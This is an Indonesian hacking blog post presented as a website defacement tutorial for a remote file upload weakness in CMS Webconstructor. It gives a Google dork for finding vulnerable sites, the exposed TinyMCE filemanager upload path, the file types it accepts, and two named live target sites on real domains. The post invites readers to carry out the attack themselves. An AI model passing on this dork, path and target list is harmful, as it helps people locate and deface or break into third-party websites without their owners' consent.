CMS Webconstructor Remote File Upload

June 27, 2018 Add Comment



Assalamualaikum sahabat Baby Cyber Mafia Ketemu sama saya lagi nih hhehe, pagi ini saya mau share tutorial deface yang ajib lagi, yaitu “CMS Webconstructor Remote File Upload Vulnerability” semoga bermanfaat ya karena saya yakin tutorial saya bermanfaat semua nya hhaha. Ok simak berikut ini.
Exploit Title: CMS Webconstructor Remote File Upload Vulnerability
Dork: intext:CMS: webconstructor.pl
Author: BadBoy
Category: Remote, Webapps
Tested on: Windows Xp SP3





Exploit 
http://[localhost]/PATH/tiny_mce/plugins/filemanager/InsertFile/insert_file.php


Allowed File 
html ,pdf ,ppt ,txt ,doc ,jpg, etc except php, php4, asp

Live Target 

– http://mexico-extreme.com/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
– http://rofel.pl/tiny_mce/plugins/filemanager/InsertFile/insert_file.php

Sudah cukup begitu, saya rasa kalian sudah mengerti bagaimana cara eksekusi nya hehe, kalau yang bingung? Komen aja di bawah, InsyaAllah saya feedback dengan cepat
Semoga bermanfaat aja ya, Wassalamualaikum
Seseorang yang lebih suka menulis dan membagikan apa yang di tuliskan agar dunia tahu.
  • Facebook
  • WhatsApp
  • Instagram
    • Tampilkan Komentar
    Sembunyikan Komentar

    0 Response to "CMS Webconstructor Remote File Upload"

    Post a Comment

    Subscribe to: Post Comments (Atom)

    Iklan Atas Artikel

    Iklan Tengah Artikel 1

    Iklan Tengah Artikel 2

    Iklan Bawah Artikel